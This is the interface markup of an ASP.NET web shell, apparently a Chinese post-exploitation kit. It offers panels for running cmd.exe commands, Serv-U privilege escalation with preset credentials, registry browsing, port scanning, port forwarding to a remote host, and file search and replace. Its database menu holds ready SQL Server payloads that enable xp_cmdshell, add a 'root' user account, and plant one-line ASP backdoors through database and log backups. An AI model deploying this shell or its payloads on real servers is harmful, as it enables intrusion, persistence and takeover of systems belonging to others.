<%--cmdshell--%>
<div runat="server" id="viac">
<p>cmd路径:<br/>
<input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
</p>
语句:<br/>
<input class="input" runat="server" id="bkcm" value="/c set" type="text" size="100"/> <asp:button id="yrql" cssclass="bt" runat="server" text="执行" onclick="fbhn"/>
<div id="tnqrf" runat="server" visible="false" enableviewstate="false">
</div>
</div>
<%--services--%>
<div runat="server" id="iqxm" visible ="false" enableviewstate="false">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<asp:table id="vhcs" runat="server" width="100%" cellspacing="0" >
<asp:tablerow cssclass="head"><asp:tablecell></asp:tablecell><asp:tablecell>id</asp:tablecell><asp:tablecell>name</asp:tablecell><asp:tablecell>path</asp:tablecell><asp:tablecell>state</asp:tablecell><asp:tablecell>startmode</asp:tablecell></asp:tablerow>
</asp:table>
</table>
</div>
<%--sysinfo--%>
<div runat="server" id="ghab" visible="false" enableviewstate="false">
<hr style=" border: 1px solid #ddd;height:0px;"/>
<ul class="info" id="bin_ul_sys" runat="server"></ul>
<h2 id="bin_h2_mac" runat="server"></h2>
<hr style=" border: 1px solid #ddd;height:0px;"/>
<ul class="info" id ="bin_ul_netconfig" runat="server"></ul>
<h2 id="bin_h2_driver" runat="server"></h2>
<hr style=" border: 1px solid #ddd;height:0px;"/>
<ul class="info" id ="bin_ul_driver" runat="server"></ul>
</div>
<%--userinfo--%>
<div runat="server" id="xwvq" visible="false" enableviewstate="false">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<asp:table id="vpa" runat="server" width="100%" cellspacing="0" >
</asp:table>
</table>
</div>
<%--suexp--%>
<div runat="server" id="apl">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<tr align="center">
<td style="width:10%"></td>
<td style="width:20%" align="left">用户名 : <input class="input" runat="server" id="dnohj" type="text" size="20" value="localadministrator"/></td>
<td style="width:20%" align="left">密码 : <input class="input" runat="server" id="nmd" type="text" size="20" value="#l@$ak#.lk;0@p"/></td>
<td style="width:20%" align="left">端口 : <input class="input" runat="server" id="hlql" type="text" size="20" value="43958"/></td>
<td style="width:10%"></td>
</tr>
<tr >
<td style="width:10%"></td>
<td colspan="5">cmdshell : <input class="input" runat="server" id="mhbjb" type="text" size="100" value="cmd.exe /c net user"/> <asp:button id="sphc" cssclass="bt" runat="server" text="执行" onclick="lrfrj"/></td>
</tr>
</table>
<div id="uhla" visible="false" enableviewstate="false" runat="server">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<tr align="center">
<td style="width:30%"></td>
<td align="left" style="width:40%"><pre id="bin_td_res" runat="server"></pre></td>
<td style="width:30%"></td>
</tr>
</table>
</div>
</div>
<%--reg--%>
<div id="kkhn" runat="server">
<p>注册表路径 : <asp:textbox id="qpdi" style="width:85%;margin:0 8px;" cssclass="input" runat="server"/><asp:button id="mona" runat="server" text="go" cssclass="bt" onclick="rafl"/></p>
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
<asp:table id="plwd" runat="server" width="100%" cellspacing="0" >
<asp:tablerow cssclass="alt1"><asp:tablecell columnspan="2" id="vyx"></asp:tablecell></asp:tablerow>
<asp:tablerow cssclass="head"><asp:tablecell width="40%">key</asp:tablecell><asp:tablecell width="60%">value</asp:tablecell></asp:tablerow>
</asp:table>
</table>
</div>
<%--portscan--%>
<div id="ywlb" runat="server">
<p>
ip : <asp:textbox id="mdr" style="width:10%;margin:0 8px;" cssclass="input" runat="server" text="127.0.0.1"/> 端口 : <asp:textbox id="lomx" style="width:40%;margin:0 8px;" cssclass="input" runat="server" text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:button id="cmuch" runat="server" text="扫描" cssclass="bt" onclick="elkq"/>
</p>
<div id="gbyt" runat="server" visible="false" enableviewstate="false"></div>
</div>
<%--database--%>
<div id="idgml" runat="server">
<p>语句 : <asp:textbox id="masr" style="width:70%;margin:0 8px;" cssclass="input" runat="server"/><asp:dropdownlist runat="server" cssclass="list" id="wymo" autopostback="true" onselectedindexchanged="zovo" ><asp:listitem></asp:listitem><asp:listitem value="server=localhost;uid=sa;pwd=;database=master;provider=sqloledb">mssql</asp:listitem><asp:listitem value="provider=microsoft.jet.oledb.4.0;data source=e:\database.mdb">access</asp:listitem></asp:dropdownlist><asp:button id="qczpa" runat="server" text="go" cssclass="bt" onclick="bgy"/></p>
<div id="dqiif" runat="server">
<div id="irtu" runat="server"></div>
<div id="uxevn" runat="server">
please select a database : <asp:dropdownlist runat="server" id="pvf" autopostback="true" onselectedindexchanged="zovo" cssclass="list"></asp:dropdownlist>
sqlexec : <asp:dropdownlist runat="server" id="fgey" autopostback="true" onselectedindexchanged="zovo" cssclass="list"><asp:listitem value="">-- sql server exec --</asp:listitem><asp:listitem value="use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">add xp_cmdshell</asp:listitem><asp:listitem value="use master dbcc addextendedproc('sp_oacreate','odsole70.dll')">add sp_oacreate</asp:listitem><asp:listitem value="exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;">add xp_cmdshell(sql2005)</asp:listitem><asp:listitem value="exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;">add sp_oacreate(sql2005)</asp:listitem><asp:listitem value="exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;">add makewebtask(sql2005)</asp:listitem><asp:listitem value="exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ad hoc distributed queries',1;reconfigure;">add openrowset/opendatasource(sql2005)</asp:listitem><asp:listitem value="exec master.dbo.xp_cmdshell 'net user'">xp_cmdshell exec</asp:listitem><asp:listitem value="exec master..xp_dirtree 'c:\',1,1">xp_dirtree</asp:listitem><asp:listitem value="declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',null,'cmd.exe /c echo ^<%execute(request(char(35)))%^>>c:\bin.asp';">sp_oamethod exec</asp:listitem><asp:listitem value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>'''">sp_makewebtask make file</asp:listitem><asp:listitem value="exec master..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\engines','sandboxmode','reg_dword',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user root root/add ")')">sandbox</asp:listitem><asp:listitem value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696e backup log @a to disk=@s;insert into [bin_cmd](cmd)values('<%execute(request(chr(35)))%>');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">logbackup</asp:listitem><asp:listitem value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696e backup database @a to disk=@s;insert into [bin_cmd](cmd)values('<%execute(request(chr(35)))%>');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t with differential,format;drop table [bin_cmd];">databasebackup</asp:listitem></asp:dropdownlist>
</div>
<table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> run sql </td></tr><tr><td><textarea id="jhiy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
<asp:button runat="server" id="wohj" cssclass="bt" text="query" onclick="orugv"/></td></tr></table>
<div style="overflow-x:auto;width:950px" >
<p>
<asp:datagrid runat="server" id="rom" headerstyle-cssclass="head" borderwidth="0" gridlines="none" ></asp:datagrid>
</p>
</div>
</div>
</div>
<%--portmap--%>
<div id="howtm" runat="server">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<tr align="center">
<td style="width:5%"></td>
<td style="width:20%" align="left">本地ip : <input class="input" runat="server" id="eepm" type="text" size="20" value="127.0.0.1"/></td>
<td style="width:20%" align="left">本地端口 : <input class="input" runat="server" id="ixdh" type="text" size="20" value="3389"/></td>
<td style="width:20%" align="left">远程ip : <input class="input" runat="server" id="llh" type="text" size="20" value="www.on-e.cn"/></td>
<td style="width:20%" align="left">远端口程 : <input class="input" runat="server" id="zhs" type="text" size="20" value="80"/></td></tr>
<tr align="center"><td colspan="5"><br/><asp:button id="fje" cssclass="bt" runat="server" text="映射端口" onclick="wdz"/> <asp:button id="gix" cssclass="bt" runat="server" text="清除所有" onclick="vjnse"/> <asp:button id="gfsm" cssclass="bt" runat="server" text="刷新" onclick="tyoz"/></td></tr></table></div>
<%--search--%>
<div id="yhv" runat="server">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<tr align="center">
<td style="width:20%" align="left">关键词</td>
<td style="width:60%" align="left"><textarea id="iamkl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
<td style="width:20%" align="left"><input type="checkbox" runat="server" id="raq" value="1"/> 使用正则表达式</td>
</tr>
<tr align="center">
<td style="width:20%" align="left">替换</td>
<td style="width:60%" align="left"><textarea id="qpe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
<td style="width:20%" align="left"><input type="checkbox" runat="server" id="yzw"/> 替换</td>
</tr>
<tr align="center">
<td style="width:20%" align="left">搜索文件类型</td>
<td style="width:60%" align="left"><input type="text" runat="server" class="input" id="udlva" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
<td style="width:20%" align="left"><asp:dropdownlist runat="server" id="ven" autopostback="false" cssclass="list"><asp:listitem value="name">文件名称</asp:listitem><asp:listitem value="content" selected="true">文件内容</asp:listitem></asp:dropdownlist></td>
</tr>
<tr align="center">
<td style="width:20%" align="left">路径</td>
<td style="width:60%" align="left"><input type="text" class="input" id="nalj" runat="server" style="width:100%" /></td>
<td style="width:20%" align="left"><asp:button cssclass="bt" id="axy" runat="server" onclick="nby" text="开始" /></td>
</tr>
</table>
<br/>
<br/>
<asp:table id="ojiym" runat="server" width="100%" cellspacing="0" >
<asp:tablerow cssclass="head"><asp:tablecell width="60%">file path</asp:tablecell><asp:tablecell width="20%">last modified</asp:tablecell><asp:tablecell width="20%">size</asp:tablecell></asp:tablerow>
</asp:table>
</div>
</td></tr></table>
<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#003300;">copyright © 2009-2012 <a href="/" target="_blank">on-e.cn</a> all rights reserved.</div></div>
</form>
</body>
</html>
推荐阅读